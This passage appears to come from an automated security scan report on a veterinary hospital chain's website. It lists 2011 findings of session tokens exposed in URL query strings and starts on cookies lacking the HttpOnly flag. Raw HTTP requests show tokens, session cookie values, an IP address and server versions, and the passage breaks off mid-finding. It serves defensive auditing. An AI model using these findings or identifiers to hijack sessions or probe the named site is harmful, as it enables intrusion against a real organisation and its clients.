GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

4.2. http://www.vcahospitals.com/hanson/offer.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

4.3. http://www.vcahospitals.com/main/offer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:14:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.4. http://www.vcahospitals.com/main/offer/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:13:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.5. http://www.vcahospitals.com/main/offer/thank-you.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Pragma: no-cache
Content-Length: 3685

fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:10:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.vcahospitals.com/hanson/appt.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

